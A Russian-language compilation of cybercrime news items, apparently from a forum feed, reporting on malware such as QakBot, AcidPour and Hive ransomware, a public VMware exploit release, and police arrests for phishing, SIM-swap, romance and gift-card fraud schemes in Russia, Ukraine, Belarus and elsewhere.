Таким образом, вредонос превратился в один из самых мощных и коварных современных троянов, объясняют в «Лаборатории Касперского». Попав в систему жертвы, QakBot пытается добраться до счетов и электронных кошельков пользователя.
Зловред недавно обзавёлся новой функцией — кражей электронных писем, которые в дальнейшем помогают киберпреступникам использовать социальную инженерию. Специалисты «Лаборатории Касперского» считают, что атаки QakBot не прекратятся в ближайшее время, однако решения компании успешно детектируют банковского трояна.
• Технический анализ QakBot: <https://securelist.ru/qakbot-technical- analysis/103485/>
Двое жителей Челябинска регистрировали юридические фирмы и оформляли банковские счета на подставных лиц. Позже мошенники использовали их в своих схемах обмана. Этот факт установила полиция Ингушетии, работая над раскрытием преступлений в регионе.
— Полицейские Ингушетии совместно с коллегами из УБК ГУ МВД России по Челябинской области и при силовой поддержке Росгвардии задержали злоумышленников по месту жительства, — прокомментировали в полиции.
Click to expand...
Подозреваемые успели провернуть мошенническую схему 29 раз. Жертвы проживают в разных регионах страны, трое — из Ингушетии. У них выманили свыше 2,5 миллиона рублей.
По решению суда всех участников преступной группы заключили под стражу. Против них возбуждены уголовные дела.
06.мвд.рф/news/item/57734409
Комиссия по ценным бумагам и биржам США (SEC) выдвинула обвинения против Абрахама Шафи, основателя и бывшего гендиректора соцсети IRL, за введение инвесторов в заблуждение.
По данным SEC, Шафи предоставлял ложные и вводящие в заблуждение данные о росте компании и скрывал факт использования корпоративных кредитных карт для личных нужд вместе со своей невестой Барбарой Вуртман.
IRL, позиционируемая как вирусное приложение соцсети, стремительно набрала популярность во время пандемии. Однако вскрылась серьёзная проблема: большинство пользователей оказались фейковыми. В июне 2023 года, после внутреннего расследования, совет директоров компании выяснил, что 95% пользователей приложения были ботами. До распада IRL Шафи удалось привлечь $170 миллионов венчурного капитала, и стартап достиг оценочной стоимости в $1,17 миллиарда.
SEC утверждает, что Шафи представил IRL как органически развивающуюся платформу с 12 миллионами пользователей. В действительности же компания тратила миллионы долларов на рекламу с предложением скачать приложение. Шафи скрыл эти расходы, предоставив документы, которые значительно занижали траты на маркетинг, и перенаправляя платежи рекламной платформы через третьих лиц.
Также были скрыты факты личных трат Шафи и Вуртман на одежду, мебель и путешествия за счёт корпоративных средств.В SEC утверждают, что Шафи воспользовался высоким спросом на инвестиции в технологические компании до их выхода на IPO, введя инвесторов в заблуждение относительно бизнес-практик IRL.
sec.gov/newsroom/press-releases/2024-92
Каталонские полицейские арестовали 39 участников преступной банды, которая обманула свыше 700 человек совокупно примерно на один миллион евро. По версии следствия, количество жертв может еще увеличиться из-за того, что многие из них даже не подозревали о своем включении в перечень должников после совершения акта мошенничества.
Отмечается, что злоумышленники сразу похищали или как минимум фотографировали документы своих жертв на побережье Коста-Дорада. Впоследствии на их имена оформлялись кредиты и покупались предметы роскоши, которые затем предназначались для перепродажи в Таррагоне и Реусе.
Данное расследование стартовало еще в прошлом году на фоне существенного роста случаев краж документов в курортных зонах Коста-Дорада. Выяснилось, что у этой организованной преступной банды имелись четкая структура и распределение обязанностей среди ее участников.
Так, аферисты получали доступ к персональным данным третьих лиц с помощью кражи или фотографирования их DNI. Преимущественно это происходило в развлекательных центрах Таррагоны и Реуса. В том случае, если банк одобрял кредит, то мошенники искали дополнительную информацию о жертвах (например, место работы и зарплаты) на интернет-сайте социальной службы. После этого они подделывали платежные ведомости и банковские справки.
Наконец, злоумышленникам выдавали кредиты на суммы от трех до пяти тысяч евро. Они тратили эти деньги на покупку дорогих телефонов и различных предметов роскоши. В ряде случаев с целью более оперативного процесса получения кредитов группировке помогал работник крупной телефонной компании, обеспечивавший быстрое согласование документов. В настоящее время все участники банды арестованы и находятся под следствием.
Новый вариант программы-вайпера AcidRain недавно был замечен «в дикой природе». Особенность вредоноса заключается в том, что он атакует исключительно устройства на Linux x86.
На новые кампании операторов AcidRain указали специалисты компании SentinelOne. В соцсети X исследователи описывают вайпер следующим образом:
«Новый образец представляет собой бинарник в формате ELF, скомпилированный для 86-битных (не MIPS) устройств. Стоит отметить, что у этого варианта по большей части новая кодовая база».
Click to expand...
AcidRain впервые был замечен в деле вскоре после начала СВО. В частности, вайпер использовался в атаках на модемы KA-SAT американской компании Viasat. Зловред может стирать файловые системы и различные хранилища, для этого он рекурсивно проходится по известным директориям в Linux.
Страны альянса «Пять глаз» приписывают атаки AcidRain российским киберпреступникам, но ожидать какого-то другого вердикта от них, конечно же, нельзя.
Новый вариант вайпера получил имя AcidPour. Его основная задача — безвозвратно
удалить данные из файловой системы UBIFS и RAID-массивов, для чего добавляются
пути /dev/dm-XX
и /dev/ubiXX
This year is most certainly looking promising, thank you Fortinet. Details sparse as they are currently urging customers to update, but this will be a good one.
 docs.fortinet.com
Но переводить ему деньги она почему-то не прекратила.
52-летняя Юлия познакомилась с Джорджем в 2022 году. Общались они только в интернете, а чтобы встретиться Джорджу постоянно нужны были деньги. То на самолет, который потом отменили, то еще на что-нибудь. Юлия исправно брала кредиты, влезала в долги и переводила деньги возлюбленному. К октябрю на счете Джорджа накопились больше 2 млн рублей и тогда Юля наконец поняла, что американец просто ее разводил.
Женщина написала заявление в полицию, заблокировала Джорджа во всех мессенджерах, но любовь оказалась сильнее — в 2023 году женщина снова начала с ним общаться. В июле она перевела мошеннику 42 тысячи «на адвокатов», а в августе — 94 тысячи, чтобы Джордж якобы смог вернуть ей все деньги.
Денег Юлия, конечно, не увидела, зато твердо и четко убедилась, что Джордж — мошенник. Женщина снова пошла в полицию, на этот раз чтобы написать заявление о мошенничестве на 135 тысяч.
Индийский адвокат из Дели стала жертвой сим-своппинга, хотя не сообщала мошенникам никаких своих данных. По данным Indian Express, женщина потеряла сотни тысяч рупий (1 рупия = 1,11 рубля), переведенных с ее банковского аккаунта, однако никаких одноразовых паролей она не получала.
Эта история началась для 35-летней жертвы мошенников с трех пропущенных звонков с одного и того же номера. Позже она перезвонила на этот номер с другого устройства: ей сообщили, что ее беспокоят из доставки. Юристу сообщили, что на ее имя пришла посылка от друга и попросили уточнить домашний адрес. Она это сделала и даже получила эту посылку от курьера на следующий день.
Однако в тот же день произошло куда менее приятное событие — с ее счета были произведены два списания крупных сумм. Она незамедлительно обратилась в полицию. Следователи сделали вывод, что речь идет о мошенничестве с подменой сим-карты, однако как именно оно было реализовано индийские оперативники пока не знают.
В истории посещений в браузере жертвы, который, видимо, синхронизирован с другими устройствами, были найдены сеансы, которые не принадлежали адвокату. В частности, посещались неизвестные ей сайты и сервисы. Кроме того, на следующий после мошенничества день юристу позвонил неизвестный, представившийся сотрудником киберкриминалистической лаборатории. Он попросил прислать ему детальную выписку с банковского счета, на что получил отказ. Позднее было установлено, что лаборатория такого запроса не делала.
Издание отмечает, что это уже четвертый подобный случай мошенничества с подменой сим-карт в Дели. Каждый из предыдущих сопровождали неясности или таинственные обстоятельства.
source: indianexpress.com/article/cities/delhi/sim-swap-fraud-advocate- receives-3-missed-calls-from-unknown-number-loses-money-from-account-8995315/
Хакеры по найму стали причиной расследования против нефтяной компании Exxon.
Израильский частный детектив Авирам Азари был осужден в Южном округе Нью-Йорка на почти 7 лет тюремного заключения за организацию международной киберпреступной схемы на заказ. Азари признал вину в апреле 2023 года по нескольким пунктам обвинения. С 2014 по 2019 год он координировал хакерские кампании от имени неустановленных заказчиков.
В ходе судебного разбирательства выяснилось, что Азари за 5 лет работы заработал более $4,8 млн. Он нанимал хакеров, в том числе из Индии, для получения доступа к электронным почтам целевых объектов. Хакеры использовали методы социальной инженерии, включая фишинговые письма, перенаправляющие жертв на поддельные веб-страницы, чтобы украсть их учетные данные.
Среди жертв Азари были известные экоактивисты, представители таких организаций, как Союз обеспокоенных ученых, Фонд семьи Рокфеллеров, Фонд по защите прав природы и Центр исследований климата. Украденные переписки перечисленных организаций были опубликованы в СМИ и использовалась в статьях, связанных с расследованиями влияния нефтяной компании Exxon на изменение климата.
Прокуроры подчеркнули, что цель этих публикаций заключалась в дискредитации расследований генеральных прокуроров штатов по делу Exxon и деятельности некоммерческих организаций, участвующих в этих расследованиях. Кроме того, Exxon, отрицая связь с Азари и хакерской кампанией, использовала украденную информацию в своих судебных исках.
Следователи подтвердили взлом более 100 жертв Азари и выявили около 200 потенциальных целей. Однако, по словам прокуроров, общее количество пострадавших лиц и организаций исчисляется тысячами по всему миру, многие из которых до сих пор не идентифицированы.
Интересно, что Азари отказался раскрывать имена своих заказчиков, кроме немецкой платежной компании Wirecard, которая теперь не существует. По данным Reuters, среди нанятых Азари хакеров были представители индийской IT-компании BellTroX, которая предоставляла услуги по хакингу.
Приговор Азари является важным этапом в борьбе с международной киберпреступностью, особенно в контексте хакинга на заказ. Дело подчеркивает серьезность угрозы, которую такая деятельность представляет для частных лиц, корпораций и общественных организаций. Также дело подчёркивает необходимость международного сотрудничества и более строгих мер в области кибербезопасности для предотвращения подобных инцидентов в будущем.
source: subscriber.politicopro.com/eenews/f/eenews/?id=0000018b-2a26-d05a-a19b-bbb63f940000
Злоумышленников разоблачили сотрудники отдела противодействия киберпреступлениям в Ивано-Франковской области совместно со следователями следственного управления области под процессуальным руководством Ивано- Франковской областной прокуратуры.
Организовали схему трое жителей Прикарпатья в возрасте от 23 до 28 лет. Путем подбора паролей фигуранты взламывали электронные почтовые ящики граждан, к которым были «привязаны» аккаунты социальных сетей. Таким образом они получали доступ к страницам и от имени владельцев отправляли сообщения друзьям последних с просьбой одолжить деньги.
Для перевода средств злоумышленники указывали номера подконтрольных банковских счетов. Полученные преступным путем средства правонарушители тратили на собственные нужды.
Сейчас установлены два десятка пострадавших, которых успели обманули мошенники. Общая сумма ущерба составляет около 150 тысяч гривен.
В домах фигурантов полицейские провели обыски. Изъяты компьютерная техника, мобильные телефоны, банковские и сим-карты, «черновые» записи, средства на общую сумму более миллиона гривен и другие доказательства противоправной деятельности. По ходатайству правоохранителей на изъятое имущество был наложен арест.
Злоумышленникам объявлено о подозрении по ч. 3 ст. 190 (Мошенничество), ч. 1, 2 ст. 361 (Несанкционированное вмешательство в работу информационных (автоматизированных), электронных коммуникационных, информационно- коммуникационных систем, электронных коммуникационных сетей) Уголовного кодекса Украины. Фигурантам грозит до пяти лет лишения свободы.
Продолжаются следственные действия с целью установления всех потерпевших от преступных действий и общей суммы нанесенного ущерба.
Криптовалютная биржа Binance заблокировала учетные записи 281 гражданина Нигерии в рамках соблюдения правил борьбы с отмыванием денег и обеспечения безопасности пользователей.
Генеральный директор Binance Чанпэн Чжао (Changpeng Zhao) [отметил](https://www.binance.com/en-NG/blog/all/a-letter-from-our-ceo-to- nigerians--our-commitment-to-user-protection-421499824684903365), что Нигерия и другие африканские страны всегда были и остаются важными рынками для развития торговой площадки. Однако безопасность пользователей остается главным приоритетом Binance, и поэтому биржа внедряет механизмы защиты, в том числе процедуру KYC, предпринимает меры по борьбе с отмыванием денег и сотрудничает с правоохранительными органами.
Для защиты сообщества и предотвращения мошеннической деятельности Binance налагает определенные ограничения на учетные записи, и эти меры могут применяться для пользователей из любых стран. На данный момент ограничениями были затронуты учетные записи 281 гражданина Нигерии, причем 38% этих аккаунтов были заблокированы по запросу международных правоохранительных органов.
Binance сообщила, что обработала уже 79 обращений пользователей в связи с возникшей ситуацией, и планирует задействовать больше сотрудников из службы поддержки клиентов и специалистов по управлению рисками, чтобы ускорить процесс урегулирования. Вопросы по ограничениям учетных записей, не связанные с правоохранительными органами, будут решены в течение двух недель.
Пользователи из Нигерии могли столкнуться с проблемами при торговле криптовалютами на Binance, так как в прошлом году ЦБ страны запретил коммерческим банкам обслуживать счета любых криптовалютных фирм, в том числе площадок для торговли цифровыми активами. Однако, по данным Chainalysis, количество криптовалютных транзакций в Нигерии растет благодаря широкому распространению P2P-платформ в развивающихся странах.
На прошлой неделе Binance предупредила пользователей о проведении масштабных проверок, в ходе которых могут быть заморожены аккаунты владельцев, использовавших чужие личные данные для прохождения процедуры идентификации личности.
В Бетхале 40-летний Томас Нгкобо, семь лет находящийся в розыске за кражу, пришел устраиваться на работу в полицию и был арестован. СМИ назвали мужчину «самым тупым преступником Южной Африки»
В 2015 году Томас работал курьером и украл товары на 1200 долларов. Менеджеры сразу сообщили о нем в полицию, правоохранители внесли данные мужчины в базу.

Семь лет Томасу удавалось скрываться от правосудия, пока он не решил
поработать в МВД. Африканец подал заявление с просьбой принять его в ряды
полиции, не получил ответа и пошел в участок, чтобы лично узнать решение
начальства. Там его и задержали.
source: odditycentral.com/news/wanted-criminal-arrested-after-walking-into- police-station-to-apply-for-job.html
В сети появился PoC-эксплоит для критической уязвимости, угрожающей таким продуктам VMware, как Workspace ONE Access, Identity Manager и vRealize Automation. Баг представляет собой обход аутентификации и позволяет злоумышленникам получить права администратора.
На прошлой неделе разработчики VMware выпустили патчи для устранения критической уязвимости CVE-2022-31656 (9,8 балла по шкале CVSS), затрагивающей VMware Workspace ONE Access, Identity Manager и vRealize Automation. Тогда сообщалось, баг представляет собой проблему обхода аутентификации, затрагивающую пользователей локального домена и позволяющий неаутентифицированным злоумышленникам получить права администратора.
В тот же день было исправлено и несколько других серьезных проблем, включая удаленное выполнение кода (CVE-2022-31658, CVE-2022-31659, CVE-2022-31665), а также повышение привилегии до уровня root (CVE-2022-31660, CVE- 2022-31661, CVE-2022-31664).
Теперь специалисты компании обновили исходный бюллетень безопасности и предупредили, что эксплоиты для CVE-2022-31656 и CVE-2022-31659 уже стали общедоступными.
Дело в том, что ИБ-специалист Петрус Вьет (Petrus Viet) из VNG Security, который обнаружил баг и сообщил о нем, опубликовал свой [PoC- эксплоит](https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware- workspace-one-access-eng-ad592ae1b6dd), а также представил подробный технический анализ проблемы в своем блоге.
По данным компании, пока нет никаких признаков того, что эти свежие уязвимости используются в реальных атаках, но теперь это может измениться. В VMware подчеркивают, что если кто-то еще не успел установить патчи, то сейчас самое время сделать это, так как эти баги могут представлять большую опасность.
На этот раз группировка Conti работает совместно с хакерами Hive
Очередная попытка взлома компьютерной системы государственного управления Коста-Рики привела отключению IT-системы здравоохранения страны и усложнила медицинское обслуживание тысяч людей. По данным правительства, 30 из 1500 серверов управления социального обеспечения (Social Security Agency, SSA) были заражены программами-вымогателями.
Атака была совершена бандой вымогателей Hive , но аналитик Emsisoft Бретта Кэллоу предположил, что Conti и Hive на данный момент установили своего рода рабочие отношения.
«Может показаться, что кто-то, кто работает с Conti, также работает с Hive. Conti, вероятно, сотрудничает с другими группировками, потому что Conti становится труднее собирать платежи с тех пор, как они объявили о поддержке со стороны России и угрожают атаками на критически важную инфраструктуру США», - сказал Кэллоу.
Президент агентства социального обеспечения Коста-Рики Альваро Рамос заявил, что быстрое отключение систем помешало киберпреступникам получить контроль и зашифровать данные. Он также добавил, что злоумышленники не потребовали выкуп.
Однако, позже Hive опубликовал требование на своем портале для переговоров с жертвами. «Чтобы расшифровать ваши системы, вы должны заплатить 5 000 000 долларов в биткоинах», - написали Hive.
По словам генерального директора SSA Роберто Сервантеса, системы выплат заработной платы и пенсий не пострадали. Отключение систем также помешало правительству обновить свои данные о заражении COVID-19 на фоне новой волны инфекции. Кроме того, министерство здравоохранения не может уведомлять инфицированных о необходимой изоляции.
Правительство Коста-Рики ожидает, что система заработает в ближайшие дни, так как над восстановлением системы работают около 300 специалистов.
Напомним, что кибератака группировки Conti заблокировала системы госучреждений
Коста-Рики. По заявлению президента Коста-Рики Родриго Чавеса, количество
пострадавших госучреждений от кибератаки группировки Conti в стране
увеличилось до 27. Чавес добавил, что 9 учреждений считаются «сильно
пострадавшими».
Ранее сообщалось, что Группировка Conti прекратила свою деятельность , но
разделилась на более мелкие группы, чтобы продолжить свое влияние в мире
киберпреступности.
Мошенники похитили у жителей Свердловской области 25 млн рублей при помощи фиктивных сайтов, созвучных с названием "Газпром". На площадках гражданам предлагалось инвестировать свои средства, сообщил в четверг журналистам руководитель пресс-службы ГУ МВД по Свердловской области Валерий Горелых.
"Свердловский главк МВД призывает граждан тщательно проверять инвестиционные площадки, прежде чем вкладывать в них сбережения. Зачастую под видом известных компаний, связанных с добычей нефти и газа, орудуют мошенники. Аферисты при помощи фиктивных сайтов "Газпрома" похитили у свердловчан 25 млн рублей", - сказал он.
Горелых привел несколько примеров. В частности, два жителя города Серова и Каменск-Уральского заметили в интернете рекламу инвестиционных программ, названия которых созвучны с наименованиями проектов, осуществляемых официальными организациями компании "Газпром", но не имеющие к ним никакого отношения. Мужчины прошли по ссылкам, ввели свои данные для обратной связи.
"Они [мошенники] убедили доверчивых свердловчан установить на телефонах соответствующее программное обеспечение и зарегистрироваться на биржевых платформах, перечислить определенное количество собственных средств на чужие счета. После непродолжительных манипуляций начинающие брокеры увидели, что их доход действительно существенно пополнился, и они решили обналичить виртуальные деньги. Однако <…> им предложили еще раз заплатить крупную сумму. С мастера потребовали 25 тыс. долларов, а с машиниста - более одного миллиона рублей. Только тогда они и поняли, что их, обманули. Таким образом, потерпевшие "пожертвовали" на процветание аферистов свыше двух миллионов рублей", - рассказал Горелых.
Он добавил, что следственные органы полиции расценили это как мошенничество и возбудили уголовное дело. Злоумышленники разыскиваются.
Введение санкций станет частью стратегии администрации Байдена по борьбе с атаками вымогательского ПО.
Администрация президента США Джо Байдена намерена разрушить систему,
поддерживающую атаки вымогательского ПО. Как сообщает The Washington Post,
Министерство финансов готовит санкции в отношении финансовых бирж,
способствующих получению киберпреступниками незаконных цифровых платежей. По
словам источника издания, санкции могут быть введены уже на этой неделе.
Введение санкций станет частью всеобъемлющей стратегии администрации Байдена
по борьбе с атаками кибервымогателей.
В настоящее время правительство США рассматривает вымогательское ПО и как
преступную угрозу, и как угрозу национальной безопасности. К примеру, в мае
нынешнего года из-за атаки
кибервымогательской группировки DarkSide (предположительно
связанной с Россией) на
оператора трубопровода Colonial Pipeline на Восточном побережье США возник
острый дефицит бензина.
В июне на Саммите в Женеве Байден
заявил Владимиру Путину о том,
что, если Россия не сможет пресечь действия хакеров, совершающих преступления
с ее территории, США готовы использовать собственные средства. В июле
американский президент обсудил с
Путиным вопрос киберпреступности еще раз. Однако, несмотря на это, хакерские
атаки по-прежнему продолжаются.
Будущие санкции призваны разрушить незаконный финансовый фундамент экосистемы
вымогательского ПО, в которой, как правило, используются цифровые финансовые
активы.
Министерство финансов США уже в течение нескольких лет регулярно вводит
санкции в отношении хакеров, в том числе кибервымогателей. В 2016 году в
санкционный список попал россиянин Евгений Богачев – разработчик
вымогательского ПО Cryptolocker, в 2013 году заразившего более 234 тыс.
компьютеров (половина из них в США). За информацию, которая поможет установить
его местонахождение, власти США объявили награду в размере $3 млн. В 2019 году
Минфин также ввел санкции в отношении киберпреступной группировки Evil Corp,
чье вымогательское ПО атаковало банки в более сорока странах мире.
Галеб Аломари отмывал деньги, украденные хакерской группировкой Lazarus Group.
Суд в США вынес приговор в отношении гражданина США и Канады Галеба Аломари (Ghaleb Alaumary), обвиняемого в отмывании десятков миллионов долларов, в том числе средств, похищенных северокорейской хакерской группировкой Lazarus Group (APT38).
По данным Министерства юстиции США, с помощью фейковых писем, отправленных якобы от имени строительной компании, работающей над крупным проектом, Аломари обманул университет в Канаде и выманил $9,4 млн, которые затем отмыл через несколько банков.
Обвиняемый также получал деньги от мошеннических схем и киберкраж, включая средства, украденные в результате кибератаки северокорейской хакерской группировки на мальтийский банк в 2019 году. Кроме того, Аломари отмывал деньги, украденные из банков в Индии и Пакистане, у компаний и организаций в США и Великобритании и частных лиц. Отмывание средств производилось через снятие наличных, банковские переводы и покупку криптовалюты.
Галеб Аломари был приговорен к 140 месяцам лишения свободы и выплате компенсации в размере $30 млн.
Source: justice[.]gov/opa/pr/international-money-launderer-sentenced- more-11-years-prison-laundering-millions-dollars
Paragon, израильский производитель шпионского ПО, который в последние годы старался оставаться в тени, на прошлой неделе был приобретён американским инвестиционным фондом AE Industrial Partners, об этом сообщают израильские СМИ.
По данным технологического новостного портала Calcalist, фонд приобрёл Paragon за 500 миллионов долларов, при этом сумма сделки может вырасти до 900 миллионов долларов в зависимости от будущих результатов компании. Издание Globes уточняет, что начальный платёж составил 450 миллионов долларов, из которых 20% предназначены 400 сотрудникам Paragon, 30% — пятерым соучредителям компании, а оставшиеся 50% пойдут фондам Battery Ventures (США) и Red Dot (Израиль).
В 2021 году журнал Forbes впервые раскрыл существование Paragon, который тогда не имел собственного веб-сайта — как, впрочем, и сейчас. По данным издания, компанию основала группа бывших офицеров израильских спецслужб: в том числе Эхуд Шнеорсон, бывший командир легендарного подразделения 8200, выпускники которого часто переходят в частный сектор кибербезопасности, а также генеральный директор Идан Нурик, технический директор Игор Богудлов и вице- президент по исследованиям Лиад Аврахам.
AE Industrial отказался комментировать сделку по запросу TechCrunch. Нурик и Аврахам не ответили на запросы в LinkedIn. Связаться с Богудловым и Шнеорсоном также не удалось. Представитель Battery Ventures, Ребекка Бакман, отказалась от комментариев, а Red Dot не ответил на поступивший запрос.
Forbes ранее сообщал, что Paragon предлагал услуги по взлому мобильных устройств, давая доступ к приложениям на телефонах целей, включая WhatsApp, Signal, Facebook Messenger и Gmail. Продукт Paragon под названием Graphite считается конкурентом печально известного Pegasus от NSO Group и других подобных шпионских инструментов.
В октябре издание Wired сообщило, что Служба иммиграционного и таможенного контроля США (ICE) заключила годовой контракт на 2 миллиона долларов с Paragon на поставку “полностью настроенного фирменного решения”, включающего лицензии, оборудование, гарантийное обслуживание, техподдержку и обучение персонала. В прошлом месяце журнал The New Yorker со ссылкой на источник в Paragon сообщил, что сделка с ICE состоялась после процедуры проверки, в ходе которой Paragon продемонстрировал наличие механизмов, препятствующих использованию продукта клиентами из других стран против американских граждан.
Проблема с использованием шпионских инструментов против граждан США уже возникала у NSO Group, которую обвиняли в поставках технологий странам, впоследствии следившим за американскими гражданами, включая сотрудников посольств США. Именно эти обвинения стали одной из причин, почему в 2021 году Министерство торговли США внесло NSO Group в экономический “чёрный список”, фактически запретив американским компаниям иметь с ней какие-либо дела. Аналогичные меры США применяли и против других производителей шпионского ПО, таких как Intellexa.
Приобретая Paragon, AE Industrial продолжает практику западных инвестиционных фондов, вкладывающихся в израильских разработчиков шпионских решений. В 2014 году американский фонд Francisco Partners за 130 миллионов долларов приобрёл 70% акций NSO Group, а в том же году, согласно утечкам электронной переписки, контактировал с ныне не существующей итальянской шпионской компанией Hacking Team. В 2019 году двое основателей NSO — Шалев Хулио и Омри Лави — выкупили компанию обратно у Francisco Partners, вернув себе контроль.
https://www.bleepingcomputer[.]com/...gets-qnap-devices-asks-50-btc-for- master-key/
Схему интернет-мошенничества разоблачили сотрудники управления противодействия киберпреступлениям Одесской области совместно со следственным управлением полиции. Шестеро мужчин в возрасте 21-24 лет создали более десятка фейковых онлайн-магазины электротехники и гаджетов. Только что поступал заказ - фигуранты звонили клиентам под видом менеджеров call-центра.
Покупателей убеждали, что выбранный товар находится в другом городе, поэтому доставка возможна только при условии полной подписки. В дальнейшем злоумышленники присылали покупателям фишинговые ссылки для уплаты или реквизиты для перевода денег. Собрав с помощью фишинга банковские реквизиты граждан, злоумышленники присваивали из них деньги. Также они присваивали подписку, полученную на карточки, и в дальнейшем прекращали связь с клиентами.
Убытки устанавливаются.
Фигурантам сообщено о подозрении в совершении уголовного правонарушения, предусмотренного ч. 4 ст. 190 (Мошенничество) Уголовного кодекса Украины. Подозреваемым грозит до 12 лет лишения свободы с конфискацией имущества. Участникам преступной группы избрана мера пресечения в виде содержания под стражей с возможностью внесения залога.
«Оперативниками ГУЭБиПК МВД России совместно с коллегами из Самарской и Калининградской областей во взаимодействии с региональным Управлением ФСБ России пресечена противоправная деятельность межрегиональной организованной группы, которая специализировалась на сбыте поддельных денежных купюр номиналом пять тысяч рублей. Магазин в теневом сегменте Интернета, через который происходила реализация фальшивых банкнот, ликвидирован», - сообщила официальный представитель МВД России Ирина Волк.
Предполагаемый организатор и трое активных участников группировки – жители Самарской области в возрасте от 30 до 40 лет задержаны на территории региона при силовой поддержке Росгвардии.
В результате оперативно-розыскных мероприятий установлено, что злоумышленники осуществили сбыт свыше 1800 поддельных денежных купюр номиналом пять тысяч рублей на общую сумму, превышающую девять миллионов.
«Следователем УМВД России по Волжскому району возбуждено уголовное дело по признакам преступления, предусмотренного частью первой статьи 186 УК РФ. По адресам проживания фигурантов произведены обыски, в ходе которых изъята компьютерная техника, мобильные телефоны, а также денежные купюры с признаками подделки. Изъятое направлено на экспертизу в ЭКЦ ГУ МВД России по Самарской области.
В настоящее время всем задержанным избрана мера пресечения в виде заключения под стражу».
• Video:
Правоохранительным органам удалась пресечь деятельность трех крупных организованных киберпреступных групп, которые совершили хищение денежных средств белорусов более 10 тыс. раз. Об этом журналистам рассказал заместитель начальника главного управления цифрового развития предварительного следствия Следственного комитета Республики Беларусь Иван Судникович.
Самым актуальным способом мошенничества в 2022 году стал фишинг — использование поддельных интернет-ресурсов. СК и МВД сконцентрировали свое внимание на борьбе с ростом подобных преступлений и определили, какие группировки атакуют белорусов.
— Их руководители находились на территории соседних стран. Мы сосредоточились на том, чтобы установить их личности и ликвидировать их деятельность. С помощью внедрения в группировку удалось раскрыть всю структуру и определить лидеров, а также роли остальных участников. Кроме того, был получен доступ к базам данных людей, помогавших совершать преступления, — рассказал И. Судникович.
И. Судникович отметил, что всех членов преступных группировок удалось задержать. Данные группы совершили более 10 тыс. хищений денежных средств у жителей Беларуси. Расследование продолжается.
Чаще всего фишинговые сайты маскируют под популярные торговые площадки, службы доставки, интернет-страницы банковских учреждений, театров и других увеселительных заведений. Особенность этого метода в том, что потерпевших под разными предлогами заманивают на фальшивые интернет-ресурсы. Ссылки на них также могут быть размещены на главных страницах поисковых систем, если мошенники оплатили рекламу.
— Часто граждане хотят оплатить коммунальные услуги, но делают это не через официальное банковское приложение, а забивают запрос в поисковой системе. Затем переходят по первой попавшейся ссылке, совсем не обращая внимание на то, что название отличается. Находясь на фишинговом сайте, они вводят данные своих банковских карт, после чего с них происходит хищение денежных средств, — привел пример начальник управления по раскрытию киберпреступлений главного управления по противодействию киберпреступности Министерства внутренних дел Республики Беларусь Александр Рингевич**.**
Несмотря на разнообразие новых способов кибермошенничества, классические методы продолжают существовать. Это могут быть и объявления о продаже товара, за который нужно внести предоплату. После получения денег злоумышленник блокирует потерпевшего. Также распространен обман, при котором якобы продают хороший товар за цену ниже рыночной. Такие предложения на торговых площадках должны вызывать подозрение.
В ходе следствия установлено, что 20-летний студент второго курса одного из вузов Хабаровска в период с 2021 по 2022 год совершил серию хищений денег с банковских карт потерпевших.
Злоумышленник размещал на популярном сервисе объявления о поиске попутчиков. При этом представлялся жителем разных регионов. Тем, кто выражал желание совершить поездку, подсудимый предлагал забронировать место в его автомобиле. Для этого потенциальные пассажиры должны были перейти по ссылке, которую получали в мессенджере, и заполнить форму. В списке обязательных для заполнения пунктов значились персональные данные и реквизиты банковской карты. После ввода необходимой информации потерпевшим приходил код, который тоже необходимо было прописать в форме. После этого со счетов пассажиров списывались деньги. Хотя правила сервиса четко гласят, что оплату водителю передавать только после завершения поездки. Несостоявшиеся попутчики пытались урегулировать с водителем вопрос, считая списание денег технической ошибкой. Но злоумышленник отключал телефон и прерывал общение.
Полицейские установили, что подсудимый генерировал мошеннические ссылки при помощи специальной программы, о которой узнал в Интернете. Для конспирации он использовал сервисы подмены номеров абонентов сотовой связи, а похищенные у потерпевших деньги поступали на банковские карты, оформленные на третьих лиц.
Задержали злоумышленника сотрудники Управления уголовного розыска УМВД России по Хабаровскому краю.
В поле зрения полицейских молодой человек попал впервые. Во время обыска по адресу проживания молодого человека изъяты ноутбук, банковские карты и сотовый телефон, которые он использовал в противоправной деятельности.
В рамках расследования уголовного дела, возбужденного следственной частью СУ УМВД России по г. Хабаровску по признакам преступления, предусмотренного ч. 3 ст. 158 Уголовного кодекса Российской Федерации «Кража», доказана причастность подсудимого к 38 противоправным фактам. Сумма ущерба составила 305 тысяч рублей. Среди потерпевших не только жители Хабаровского края, но и 15 других регионов России.
В отношении злоумышленника была избрана мера пресечения в виде подписки о невыезде и надлежащем поведении. В процессе следствия он свою вину признал в полном объеме, подтвердил свои показания на следственных действиях, сообщил и показал ресурсы в сети Интернет, которые использовал для совершения преступлений.
Суд назначил горожанину наказание в виде лишения свободы на срок пять лет условно с испытательным сроком на пять лет.
Не менее тысячи человек стали жертвами банды мошенников, подделывавших подарочные карты Walmart в штате Техас. Четверо кардеров были арестованы в сентябре 2023 года и теперь заслушали обвинения. Сама схема реализовывалась на протяжении всего лишь нескольких месяцев.
Выяснилось, что злоумышленники под предводительством 42-летнего Дженди О'Рейли (Geandy O’Reilly) раскладывали перекодированные карточки на витринах магазинов сети Walmart, а трое его сообщников следили за покупателями. Как только деньги поступали на пластик, О'Рейли тратил их на различные покупки.
В частности, он приобрел ювелирные изделия на сумму более 5700 долларов, кухонную технику на 5600 долларов, хвосты лобстеров на 2500 долларов и телевизоры с большим экраном на 3300 долларов. При обыске у О'Рейли конфисковали около 7000 подарочных карт Walmart, два карт-ридера, более 3000 долларов наличными, 50 ящиков пива Modelo Especial, 38 ящиков пива Corona Extra, один ноутбук, шесть мобильных телефонов, шесть телевизоров с плоским экраном и PlayStation 5.
Пятеро злоумышленников получали данные банковских карт граждан с помощью фишинговых ссылок, которые копировали интерфейс популярных интернет-сервисов. Установлено 44 человека, пострадавших от действий злоумышленников. Фигурантам грозит до двенадцати лет за решеткой.
Аферистов разоблачили киберполицейские Харьковщины совместно со следователями Главного следственного управления Нацполиции под процессуальным руководством Офиса Генерального прокурора.
По результатам досудебного расследования доказана причастность 5 человек к противоправной деятельности. Фигуранты создали и администрировали телеграм- сообщество, где размещали фишинговые ссылки на ряд популярных сервисов и сайтов объявлений, а также ссылки, содержащие предложения по оформлению международной помощи.
Данные, введенные пользователями на фишинговых сайтах, автоматически становились известны обвиняемым. Таким образом злоумышленники получали доступ к интернет-банкингу жертв и присваивали их сбережения.
